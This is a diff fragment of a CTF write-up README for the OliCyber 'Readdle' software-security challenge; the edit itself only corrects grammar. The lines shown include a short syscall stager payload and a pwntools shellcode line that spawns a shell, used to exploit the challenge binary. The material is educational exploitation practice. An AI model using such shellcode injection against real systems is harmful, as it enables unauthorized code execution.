samuelevalperta/ctf/OliCyber/OlimpiadiItalianediCybersecurity/SoftwareSecurity/Readdle_SOLVED/README.md

 ```python
 payload = "\x54\x5a\x0f\x05"
 ```
-at this point we can send a **shell code** shorter than `0x7fffffffe058` bytes that will be executed starting from the 4th, [Pwntools](https://github.com/Gallopsled/pwntools) come to help now...
+at this point we can send a **shell code** shorter than `0x7fffffffe058` bytes that will be executed starting from the 4th, [Pwntools](https://github.com/Gallopsled/pwntools) comes to help now...
 ```python
 shellcode = b"\x90"*4 + asm(shellcraft.sh())
 ```